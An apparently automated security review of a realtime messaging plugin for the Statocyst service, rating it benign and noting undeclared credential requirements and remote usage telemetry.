Back to plugin
Pluginv0.1.1
ClawScan security
Statocyst Realtime · ClawHub's context-aware review of the artifact, metadata, and declared behavior.
Scanner verdict
BenignMar 27, 2026, 6:11 PM
- Verdict
- benign
- Confidence
- high
- Model
- gpt-5-mini
- Summary
- The package implements a realtime Statocyst transport and tools that match its description — it needs a Statocyst baseUrl/token (supplied via plugin config or config file) and will register/use a remote Statocyst service; the registry metadata omits declaring those required config items, which is the only notable inconsistency.
- Guidance
- This plugin appears to do what it says: connect to a Statocyst server, register the plugin, open a websocket, and exchange skill_request/skill_result messages. Before installing: 1) Expect to supply a Statocyst baseUrl and a bearer token (via plugin config or a JSON file or STATOCYST_CONFIG_FILE) — the registry metadata failing to declare this is an oversight. 2) Be aware the plugin registers itself and logs usage in the remote Statocyst service (telemetry on agent/plugin usage). Don't give a high-privilege token — create and use an agent token with the minimum necessary scope/trust. 3) Review and trust the Statocyst host (baseUrl) you configure; remote hosts will receive skill requests and see activity. 4) Confirm package provenance (npm or ClawHub and the GitHub repo) and test in a staging environment first. 5) The repository contains e2e/dev scripts (docker, spawnSync) used only for tests — they are not executed by the plugin at runtime but you can review them if you want to validate behavior locally.
Review Dimensions
- Purpose & Capability
- noteThe plugin's code, README, and SKILL.md implement realtime websocket messaging, skill_request/skill_result exchange, and plugin registration with Statocyst — exactly what the name/description say. Note: registry metadata lists no required env vars, but the plugin requires a Statocyst bearer token and baseUrl (via plugin config or config file); the metadata omission is inconsistent with the documented runtime needs.
- Instruction Scope
- okRuntime instructions constrain behavior to Statocyst integration: registering the plugin, opening a dedicated websocket at /v1/openclaw/messages/ws, sending publish/ack/pull messages, and optionally reading a JSON config file (e.g., /etc/molten/statocyst-openclaw.json). There are no instructions to read unrelated system files or exfiltrate arbitrary host data. The README also documents that plugin usage is recorded on the remote Statocyst service, which is expected for this integration.
- Install Mechanism
- okThere is no high-risk download/install step in the package manifest: code is included, package.json points to a published npm package, and the only runtime dependency is the well-known 'ws' npm library. No external arbitrary-URL downloads or archive extraction are present in the install spec.
- Credentials
- noteThe plugin legitimately needs a Statocyst bearer token, baseUrl, sessionKey, and optional configFile/timeout — all documented in SKILL.md and enforced by the code. However, the registry 'required env vars' metadata is empty, which is misleading. The plugin will read process.env and an optional config file (possibly under /etc) for the token; that is proportional but you should ensure the token you provide is scoped/minimal.
- Persistence & Privilege
- okThe plugin does not request always:true and does not modify other plugins or system-wide settings. It registers itself with the remote Statocyst service (remote telemetry/usage logging) which is a normal behavior for this kind of adapter but increases remote visibility of agent activity.